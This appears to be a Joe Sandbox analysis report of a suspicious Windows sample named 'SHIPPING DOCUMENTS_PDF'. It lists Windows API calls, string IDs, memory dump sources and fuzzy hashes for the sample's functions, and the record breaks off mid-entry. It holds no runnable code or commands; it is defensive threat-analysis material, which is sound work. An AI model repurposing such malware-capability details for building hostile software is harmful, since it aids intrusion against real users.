                                                                                    • Opcode Fuzzy Hash: ab0356434cebf759f7f86e7273152a03fa64e032a8d1fe669bb5861b04abe7d2
                                                                                    • Instruction Fuzzy Hash: 06519A319183019FC710EF14C892ABEB7E5EF94740F5488AEF896572A2DBB19909CA53
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __i64tow__itow__swprintf
                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                    • API String ID: 421087845-2263619337
                                                                                    • Opcode ID: 855bbbf9a699e8aba5dbc7b6a93cc144a40a91b461821a3e4a603237613ccb58
                                                                                    • Instruction ID: 041f304e7c98a297dec2dfd0fc52e30dba6d9ad75f7269b44748f8b74e5d7ef2
                                                                                    • Opcode Fuzzy Hash: 855bbbf9a699e8aba5dbc7b6a93cc144a40a91b461821a3e4a603237613ccb58
                                                                                    • Instruction Fuzzy Hash: CE41D671614206EFDB24EF74D882BBA73E8EF15300F2484FEE959D7291EA319946CB10
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BD716A
                                                                                    • CreateMenu.USER32 ref: 00BD7185
                                                                                    • SetMenu.USER32(?,00000000), ref: 00BD7194
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BD7221
                                                                                    • IsMenu.USER32(?), ref: 00BD7237
                                                                                    • CreatePopupMenu.USER32 ref: 00BD7241
                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BD726E
                                                                                    • DrawMenuBar.USER32 ref: 00BD7276
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                    • String ID: 0$F
                                                                                    • API String ID: 176399719-3044882817
                                                                                    • Opcode ID: 3048c031edbcbf26977b481ec1e99559d9560d49fcec0b5bd441136a24b265aa
                                                                                    • Instruction ID: 36f2face16ecb11fc6e2fc637b16d71ba031e5169cc7b50adb4c454659f81302
                                                                                    • Opcode Fuzzy Hash: 3048c031edbcbf26977b481ec1e99559d9560d49fcec0b5bd441136a24b265aa
                                                                                    • Instruction Fuzzy Hash: 27412874A05205EFDB14DF64D884BEABBF5FF4A350F1441AAF905A7351EB31A910CB90
                                                                                    APIs
                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00BD755E
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00BD7565
                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00BD7578
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00BD7580
                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BD758B
                                                                                    • DeleteDC.GDI32(00000000), ref: 00BD7594
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00BD759E
                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00BD75B2
                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00BD75BE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                    • String ID: static
                                                                                    • API String ID: 2559357485-2160076837
                                                                                    • Opcode ID: fc46e71acafff161069a16f186bcc81ae5f674a5d0e6fc98b11aa398e4479e3d
                                                                                    • Instruction ID: 776f3085788f1a3168f006a1c579c28191331c068179fd6639a5b8e6d9986b2a
                                                                                    • Opcode Fuzzy Hash: fc46e71acafff161069a16f186bcc81ae5f674a5d0e6fc98b11aa398e4479e3d
                                                                                    • Instruction Fuzzy Hash: 40319231105115BBDF119F64DC19FEBBBA9FF19324F114266FA16922E0EB31D811DB60
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00B76E3E
                                                                                      • Part of subcall function 00B78B28: __getptd_noexit.LIBCMT ref: 00B78B28
                                                                                    • __gmtime64_s.LIBCMT ref: 00B76ED7
                                                                                    • __gmtime64_s.LIBCMT ref: 00B76F0D
                                                                                    • __gmtime64_s.LIBCMT ref: 00B76F2A
                                                                                    • __allrem.LIBCMT ref: 00B76F80
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B76F9C
                                                                                    • __allrem.LIBCMT ref: 00B76FB3
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B76FD1
                                                                                    • __allrem.LIBCMT ref: 00B76FE8
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B77006
                                                                                    • __invoke_watson.LIBCMT ref: 00B77077
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                    • String ID:
                                                                                    • API String ID: 384356119-0
                                                                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                    • Instruction ID: 971e340617294d8811cb2ad45ae647be3a8a559877337b8f2cc689f7f1b3ab1d
                                                                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                    • Instruction Fuzzy Hash: 3171E876A40B17ABD714AE78DC81B5AB3E4EF04724F14C5B9F528D7291EB70DE408790
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BB2542
                                                                                    • GetMenuItemInfoW.USER32(00C15890,000000FF,00000000,00000030), ref: 00BB25A3
                                                                                    • SetMenuItemInfoW.USER32(00C15890,00000004,00000000,00000030), ref: 00BB25D9
                                                                                    • Sleep.KERNEL32(000001F4), ref: 00BB25EB
                                                                                    • GetMenuItemCount.USER32(?), ref: 00BB262F
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00BB264B
                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00BB2675
                                                                                    • GetMenuItemID.USER32(?,?), ref: 00BB26BA
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BB2700
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB2714
                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB2735
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                    • String ID:
                                                                                    • API String ID: 4176008265-0
                                                                                    • Opcode ID: 26e574041c224a572c6329ad1ef1bce2e20974300111ae9fda117d8ca0132fe5
                                                                                    • Instruction ID: 3dee1b787c799db79a7ba2e9c1b675e3a956179ba104286d07b894d610e369ad
                                                                                    • Opcode Fuzzy Hash: 26e574041c224a572c6329ad1ef1bce2e20974300111ae9fda117d8ca0132fe5
                                                                                    • Instruction Fuzzy Hash: A0618D7090024AAFDF21CF64DC98EFEBBF8EB45308F144599E842A7251DBB1AD05DB21
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00BD6FA5
                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00BD6FA8
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00BD6FCC
                                                                                    • _memset.LIBCMT ref: 00BD6FDD
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BD6FEF
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00BD7067
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 830647256-0
                                                                                    • Opcode ID: 7c7372fcf05e9bf527e53ef85c13a35cbff45e7217b15288fd3b7cd6432e3ded
                                                                                    • Instruction ID: c7d36b6eb51e5c8602c5d572ff233c49ce0c7f4089db78496b41c8131c1dd829
                                                                                    • Opcode Fuzzy Hash: 7c7372fcf05e9bf527e53ef85c13a35cbff45e7217b15288fd3b7cd6432e3ded
                                                                                    • Instruction Fuzzy Hash: 86616D75940208AFDB11DFA4CC81FEEB7F8EB49710F14419AFA14AB3A1E771A941DB90
                                                                                    APIs
                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00BA6BBF
                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00BA6C18
                                                                                    • VariantInit.OLEAUT32(?), ref: 00BA6C2A
                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00BA6C4A
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 00BA6C9D
                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00BA6CB1
                                                                                    • VariantClear.OLEAUT32(?), ref: 00BA6CC6
                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00BA6CD3
                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BA6CDC
                                                                                    • VariantClear.OLEAUT32(?), ref: 00BA6CEE
                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BA6CF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                    • String ID:
                                                                                    • API String ID: 2706829360-0
                                                                                    • Opcode ID: 69342fb6e0559363ffd8d9aeba560d0b8c016d6b11b7efb9eb333501a39add19
                                                                                    • Instruction ID: 4b845bba5bad86115ddc61230d6f8a5b29c64b39d8dde6f097707dfd42d868d8
                                                                                    • Opcode Fuzzy Hash: 69342fb6e0559363ffd8d9aeba560d0b8c016d6b11b7efb9eb333501a39add19
                                                                                    • Instruction Fuzzy Hash: 37413F75A04219EFCF00DF68D8549AEBBF9EF09354F0480A9E956E7361DB30A945CFA0
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00BC5793
• inet_addr.WSOCK32(?), ref: 00BC57D8
• gethostbyname.WSOCK32(?), ref: 00BC57E4
• IcmpCreateFile.IPHLPAPI ref: 00BC57F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BC5862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00BC5878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 00BC58ED
• WSACleanup.WSOCK32 ref: 00BC58F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: 8ad1f899d4ec4b355ce97e98f412b08406a5795473eb6b670fe234adac699448
• Instruction ID: 4c1018e77bf952599008184b5cad816df8191ce769f7bf3280969b9c4e38f2d5
• Opcode Fuzzy Hash: 8ad1f899d4ec4b355ce97e98f412b08406a5795473eb6b670fe234adac699448
• Instruction Fuzzy Hash: 46516F316047019FDB209F24DC95F6AB7E4EF48710F0485AAF996DB2A1DB70E844DB51
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00BBB4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00BBB546
• GetLastError.KERNEL32 ref: 00BBB550
• SetErrorMode.KERNEL32(00000000,READY), ref: 00BBB5BD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: d074e9469bd606d8de1ae7e189e94c49f4686ae2c89f39edad8918e03d6b3626
• Instruction ID: 2efe9442d699f94626e00bcf5335622845079d8dc4c51f322de4c7b04731d85c
• Opcode Fuzzy Hash: d074e9469bd606d8de1ae7e189e94c49f4686ae2c89f39edad8918e03d6b3626
• Instruction Fuzzy Hash: 1E316F75A00209DBCB20EB68CCA5FFDB7F4EF14311F1441A6E90597291DBF09A45CB52
APIs
  • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
  • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00BA9014
• GetDlgCtrlID.USER32 ref: 00BA901F
• GetParent.USER32 ref: 00BA903B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00BA903E
• GetDlgCtrlID.USER32(?), ref: 00BA9047
• GetParent.USER32(?), ref: 00BA9063
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00BA9066
Strings
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
• Opcode ID: a4a7d33a70852cdf8035cae2d123a7da2dafb4417518743916348b7d971a6f31
• Instruction ID: 74143a514924df24d5b739906977eca92bd739069cda8c36cac6b25accbe0439
• Opcode Fuzzy Hash: a4a7d33a70852cdf8035cae2d123a7da2dafb4417518743916348b7d971a6f31
• Instruction Fuzzy Hash: E9210870A04105BFDF15ABA0CC95EFEB7B4EF49310F0041A6B912972F1DF359818DA20
APIs
  • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
  • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00BA90FD
• GetDlgCtrlID.USER32 ref: 00BA9108
• GetParent.USER32 ref: 00BA9124
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00BA9127
• GetDlgCtrlID.USER32(?), ref: 00BA9130
• GetParent.USER32(?), ref: 00BA914C
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00BA914F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
• Opcode ID: fc43b043c74145cf4fe59d0f2e9dc1bd224ee59abdaa2b0b034ecabe648589b4
• Instruction ID: d1240ed463ae7a76c0257a659d7c53319cc12bdd524e845f26391371c5fbffc7
• Opcode Fuzzy Hash: fc43b043c74145cf4fe59d0f2e9dc1bd224ee59abdaa2b0b034ecabe648589b4
• Instruction Fuzzy Hash: 1E21F574A04109BBDF15ABA0CC95EFEBBF4EF49300F0041A6B911A72E1EB759819DB20
APIs
• GetParent.USER32 ref: 00BA916F
• GetClassNameW.USER32(00000000,?,00000100), ref: 00BA9184
• _wcscmp.LIBCMT ref: 00BA9196
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00BA9211
Strings
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
• Opcode ID: 5e23098a190ade5b5651a4b969f08a5c6dda5fdf708aeb65aaba0ee57ab45e73
• Instruction ID: b8e42bb1a85ca20b1b51664281d1897e1ded1e9cbe8bdc0f1732197871014d32
• Opcode Fuzzy Hash: 5e23098a190ade5b5651a4b969f08a5c6dda5fdf708aeb65aaba0ee57ab45e73
• Instruction Fuzzy Hash: 8111593664C307BAFA182624EC0BEB777DCDB12720B2001A7F914E14D1FE616C51A990
APIs
• VariantInit.OLEAUT32(?), ref: 00BC88D7
• CoInitialize.OLE32(00000000), ref: 00BC8904
• CoUninitialize.OLE32 ref: 00BC890E
• GetRunningObjectTable.OLE32(00000000,?), ref: 00BC8A0E
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00BC8B3B
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00BE2C0C), ref: 00BC8B6F
• CoGetObject.OLE32(?,00000000,00BE2C0C,?), ref: 00BC8B92
• SetErrorMode.KERNEL32(00000000), ref: 00BC8BA5
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00BC8C25
• VariantClear.OLEAUT32(?), ref: 00BC8C35
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID:
• API String ID: 2395222682-0
• Opcode ID: 03d4d04608a4e3b792f560b81a594bcb1c2f594bf17a6f14106b24810b1c02a7
• Instruction ID: 0c9f5600a5026fb0333dcc300edae783c04e64e71ba1fddc3c76e671b864786e
• Opcode Fuzzy Hash: 03d4d04608a4e3b792f560b81a594bcb1c2f594bf17a6f14106b24810b1c02a7
• Instruction Fuzzy Hash: 89C1F2B1608305AFD700DF64C884E2AB7E9EF89748F04499DF98A9B261DB71ED05CB52
APIs
• SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00BB7A6C
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: ArraySafeVartype
• String ID:
• API String ID: 1725837607-0
• Opcode ID: 6f8dac1ee76836daf31f04329476d0a29a59cf18045f37615c166eb083d7efec
• Instruction ID: 09be4dc35d9350e02e55fd3475957bd547748a19fd82967d936e305294226c9f
• Opcode Fuzzy Hash: 6f8dac1ee76836daf31f04329476d0a29a59cf18045f37615c166eb083d7efec
• Instruction Fuzzy Hash: 2AB1927194821A9FDB10DFA4C894BFEBBF4EF89321F1044A9E551E7241DBB4E941CB90
APIs
• GetCurrentThreadId.KERNEL32 ref: 00BB11F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00BB0268,?,00000001), ref: 00BB1204
• GetWindowThreadProcessId.USER32(00000000), ref: 00BB120B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BB0268,?,00000001), ref: 00BB121A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00BB122C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BB0268,?,00000001), ref: 00BB1245
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BB0268,?,00000001), ref: 00BB1257
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00BB0268,?,00000001), ref: 00BB129C
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00BB0268,?,00000001), ref: 00BB12B1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00BB0268,?,00000001), ref: 00BB12BC
Memory Dump Source
• Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
• Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
